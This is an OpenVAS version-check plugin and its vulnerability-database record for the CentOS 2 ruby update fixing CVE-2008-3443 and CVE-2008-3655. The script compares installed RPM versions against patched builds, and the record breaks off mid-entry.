CentOS Update for ruby CESA-2008:0895-02 centos2 i386
2009-02-27T00:00:00
ID OPENVAS:880179 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2017-07-10T00:00:00
Description
Check for the Version of ruby
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for ruby CESA-2008:0895-02 centos2 i386
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
# Advisory text that the registration block below attaches to the plugin as
# its "insight" tag. It covers the two issues this check is registered for:
# CVE-2008-3655 (bypass of safe-level restrictions) and CVE-2008-3443 (denial
# of service in the regular expression engine). The literal spans several
# lines, so its line breaks are part of the value.
tag_insight = "Ruby is an interpreted scripting language for quick and easy
object-oriented programming.
A number of flaws were found in the safe-level restrictions in Ruby. It
was possible for an attacker to create a carefully crafted malicious script
that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)
A denial of service flaw was found in Ruby's regular expression engine. If
a Ruby script tried to process a large amount of data via a regular
expression, it could cause Ruby to enter an infinite-loop and crash.
(CVE-2008-3443)
Users of ruby should upgrade to these updated packages, which contain
backported patches to resolve these issues.";
# Affected product and platform; registered below as the "affected" tag.
tag_affected = "ruby on CentOS 2";
# Remediation text; registered below as the "solution" tag. It names no
# version: the fixed builds are the 1.6.4~7.el2 RPM strings passed to
# isrpmvuln() in the detection part of this script.
tag_solution = "Please Install the Updated Packages.";
# Registration phase. When `description` is set, only the metadata below is
# recorded and the script ends at exit(0), so the package comparison further
# down is not reached in this phase.
if(description)
{
  # Vendor announcement for the advisory.
  script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html");

  # Plugin identity and revision bookkeeping.
  script_id(880179);
  script_version("$Revision: 6651 $");
  script_tag(name:"last_modification", value:"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $");
  script_tag(name:"creation_date", value:"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)");

  # Severity as a CVSS v2 base score and vector (the Au: metric exists only
  # in v2), followed by the advisory and CVE cross-references.
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_xref(name:"CESA", value:"2008:0895-02");
  script_cve_id("CVE-2008-3443", "CVE-2008-3655");

  # Display name, summary, category, copyright and family.
  script_name("CentOS Update for ruby CESA-2008:0895-02 centos2 i386");
  script_summary("Check for the Version of ruby");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
  script_family("CentOS Local Security Checks");

  # The check depends on gather-package-list.nasl and on two knowledge-base
  # keys under ssh/login/.
  # NOTE(review): presumably those keys exist only after an authenticated SSH
  # login to a CentOS host has produced an RPM list, which would mean an
  # unauthenticated scan never runs this check -- confirm against
  # gather-package-list.nasl.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/centos", "ssh/login/rpms");

  # Descriptive tags built from the strings defined above this block.
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"insight", value:tag_insight);

  # qod_type "package": the finding rests on comparing installed package
  # versions, not on exercising either flaw. solution_type "VendorFix": the
  # remedy is the vendor's updated packages.
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}
include("pkg-lib-rpm.inc");
# Detection phase: compare the ruby-related RPMs against the 1.6.4~7.el2
# builds. Only the release string "CentOS2" is handled; any other value
# falls through without producing a result.
release = get_kb_item("ssh/login/release");
res = "";

# No release string in the knowledge base: nothing to compare against.
if(release == NULL)
{
  exit(0);
}

if(release == "CentOS2")
{
  # NOTE(review): isrpmvuln() comes from pkg-lib-rpm.inc and is not shown
  # here; presumably it returns report text when the installed package is
  # older than the given build and NULL otherwise -- confirm in the include.
  #
  # The packages are tested in a fixed order and the first non-NULL result
  # ends the script, so a host with several outdated ruby packages yields a
  # single finding built from the first one only.
  res = isrpmvuln(pkg:"irb", rpm:"irb~1.6.4~7.el2", rls:"CentOS2");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  res = isrpmvuln(pkg:"ruby", rpm:"ruby~1.6.4~7.el2", rls:"CentOS2");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  res = isrpmvuln(pkg:"ruby-devel", rpm:"ruby-devel~1.6.4~7.el2", rls:"CentOS2");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  res = isrpmvuln(pkg:"ruby-docs", rpm:"ruby-docs~1.6.4~7.el2", rls:"CentOS2");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  res = isrpmvuln(pkg:"ruby-libs", rpm:"ruby-libs~1.6.4~7.el2", rls:"CentOS2");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  res = isrpmvuln(pkg:"ruby-tcltk", rpm:"ruby-tcltk~1.6.4~7.el2", rls:"CentOS2");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  # __pkg_match is not assigned anywhere in this file.
  # NOTE(review): presumably pkg-lib-rpm.inc sets it when one of the listed
  # packages was found installed. In that case exit(99) marks the host as
  # not vulnerable; the plain exit(0) that follows reports nothing either way.
  if(__pkg_match)
    exit(99); # Not vulnerable.

  exit(0);
}
{"bulletinFamily": "scanner", "viewCount": 0, "naslFamily": "CentOS Local Security Checks", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html", "2008:0895-02"], "description": "Check for the Version of ruby", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "e35b2abbe1f69aa6d9f0da59fcea58b0"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "331b58e321264483e841023b1f76a7d1"}, {"key": "href", "hash": "fe195daad44d64f1ab57f94fe6761d9f"}, {"key": "modified", "hash": "0d134bf170d66438eb1e01173ee0187f"}, {"key": "naslFamily", "hash": "8f8213e8b86855939d5beea715ce3045"}, {"key": "pluginID", "hash": "aba41365ffc13d29947ef59ea69241ee"}, {"key": "published", "hash": "35afa346a8e2805a0b04c27bc47830d3"}, {"key": "references", "hash": "c354dbc8c0b1252ee80ebc280bd791b0"}, {"key": "reporter", "hash": "b7e844243a0b30893b9118e3563e6521"}, {"key": "sourceData", "hash": "0d1772cc44e182f9a9e56e19c3b3e169"}, {"key": "title", "hash": "a2c21c99cd7d593b0764c3c9a92b3c83"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "href": "http://plugins.openvas.org/nasl.php?oid=880179", "modified": "2017-07-10T00:00:00", "objectVersion": "1.3", "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-07-25T10:56:22"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3655", "CVE-2008-3443"]}, {"type": "openvas", "idList": ["OPENVAS:870086", "OPENVAS:1361412562310870086", "OPENVAS:1361412562310880179", "OPENVAS:880190", "OPENVAS:1361412562310870065", "OPENVAS:1361412562310880190", "OPENVAS:1361412562310880056", "OPENVAS:870065", "OPENVAS:880056", "OPENVAS:1361412562310880070"]}, {"type": "centos", "idList": ["CESA-2008:0895-02", "CESA-2008:0896", "CESA-2008:0897"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2008-0895.NASL", 
"ORACLELINUX_ELSA-2008-0896.NASL", "REDHAT-RHSA-2008-0896.NASL", "CENTOS_RHSA-2008-0896.NASL", "MANDRIVA_MDVSA-2008-226.NASL", "FEDORA_2008-8736.NASL", "SL_20081021_RUBY_ON_SL3_X.NASL", "DEBIAN_DSA-1695.NASL", "UBUNTU_USN-651-1.NASL", "SUSE_11_RUBY-090703.NASL"]}, {"type": "redhat", "idList": ["RHSA-2008:0895", "RHSA-2008:0896", "RHSA-2008:0897"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0896", "ELSA-2008-0897"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1695-1:CB9A2", "DEBIAN:DSA-1651-1:0FC77", "DEBIAN:DSA-1652-1:B2D5C"]}, {"type": "exploitdb", "idList": ["EDB-ID:32224", "EDB-ID:6239", "EDB-ID:32223"]}, {"type": "seebug", "idList": ["SSV:4621"]}, {"type": "ubuntu", "idList": ["USN-691-1", "USN-651-1"]}, {"type": "freebsd", "idList": ["C329712A-6B5B-11DD-9D79-001FC61C2A55", "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55"]}, {"type": "suse", "idList": ["SUSE-SA:2009:037"]}, {"type": "gentoo", "idList": ["GLSA-200812-17"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21825"]}], "modified": "2017-07-25T10:56:22"}, "vulnersScore": 6.4}, "id": "OPENVAS:880179", "title": "CentOS Update for ruby CESA-2008:0895-02 centos2 i386", "hash": "f2d57c598388d67831143db3d9f7b7afd2a70d55d2b60c3909981da36390749d", "edition": 2, "published": "2009-02-27T00:00:00", "type": "openvas", "history": [{"lastseen": "2017-07-02T21:13:55", "bulletin": {"hash": "cab9f5264dfd4f791609d5f49a46eb51b6d9063c4b5ea28edd56176a42d73c0b", "viewCount": 0, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html", "2008:0895-02"], "description": "Check for the Version of ruby", "hashmap": [{"key": "sourceData", "hash": "732a623f09f2715c61fdc460dde6f274"}, {"key": "pluginID", "hash": "aba41365ffc13d29947ef59ea69241ee"}, {"key": "title", "hash": "a2c21c99cd7d593b0764c3c9a92b3c83"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "naslFamily", "hash": "8f8213e8b86855939d5beea715ce3045"}, 
{"key": "reporter", "hash": "b7e844243a0b30893b9118e3563e6521"}, {"key": "references", "hash": "c354dbc8c0b1252ee80ebc280bd791b0"}, {"key": "published", "hash": "35afa346a8e2805a0b04c27bc47830d3"}, {"key": "description", "hash": "331b58e321264483e841023b1f76a7d1"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "href", "hash": "fe195daad44d64f1ab57f94fe6761d9f"}, {"key": "cvelist", "hash": "e35b2abbe1f69aa6d9f0da59fcea58b0"}, {"key": "modified", "hash": "4ed7125049d645019b6eebcb04b5daf6"}], "naslFamily": "CentOS Local Security Checks", "modified": "2016-05-03T00:00:00", "objectVersion": "1.3", "href": "http://plugins.openvas.org/nasl.php?oid=880179", "published": "2009-02-27T00:00:00", "enchantments": {}, "id": "OPENVAS:880179", "title": "CentOS Update for ruby CESA-2008:0895-02 centos2 i386", "bulletinFamily": "scanner", "edition": 1, "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2008:0895-02 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\");\n script_id(880179);\n script_version(\"$Revision: 3212 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-05-03 13:45:47 +0200 (Tue, 03 May 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"CentOS Update for ruby CESA-2008:0895-02 centos2 i386\");\n\n script_summary(\"Check for the Version of ruby\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"HostDetails/OS/cpe:/o:centos:centos\", \"login/SSH/success\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "type": "openvas", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2008-3655", "CVE-2008-3443"], "lastseen": "2017-07-02T21:13:55", "pluginID": "880179"}, "differentElements": 
["modified", "sourceData"], "edition": 1}], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2008-3655", "CVE-2008-3443"], "lastseen": "2017-07-25T10:56:22", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2008:0895-02 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\");\n script_id(880179);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"CentOS Update for ruby CESA-2008:0895-02 centos2 i386\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "pluginID": "880179"}
{"cve": [{"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.", "modified": "2018-10-03T21:55:00", "id": "CVE-2008-3443", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3443", "published": "2008-08-14T23:41:00", "title": "CVE-2008-3443", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 does not properly restrict access to critical variables and methods at various safe levels, which allows context-dependent attackers to bypass intended access restrictions via (1) untrace_var, (2) $PROGRAM_NAME, and (3) syslog at safe level 4, and (4) insecure methods at safe levels 1 through 3.", "modified": "2018-10-11T20:48:00", "id": "CVE-2008-3655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3655", "published": "2008-08-13T01:41:00", "title": "CVE-2008-3655", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-04-09T11:39:27", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880179", "id": "OPENVAS:1361412562310880179", "type": "openvas", "title": "CentOS Update for ruby CESA-2008:0895-02 centos2 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby 
CESA-2008:0895-02 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880179\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"CentOS Update for ruby CESA-2008:0895-02 centos2 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", 
rpm:\"irb~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:50", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870086", "id": "OPENVAS:870086", "title": "RedHat Update for ruby RHSA-2008:0895-02", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0895-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS (Advanced Server) version 2.1,\n Red Hat Enterprise Linux ES version 2.1,\n Red Hat Enterprise Linux WS version 2.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00010.html\");\n script_id(870086);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0895-02\");\n 
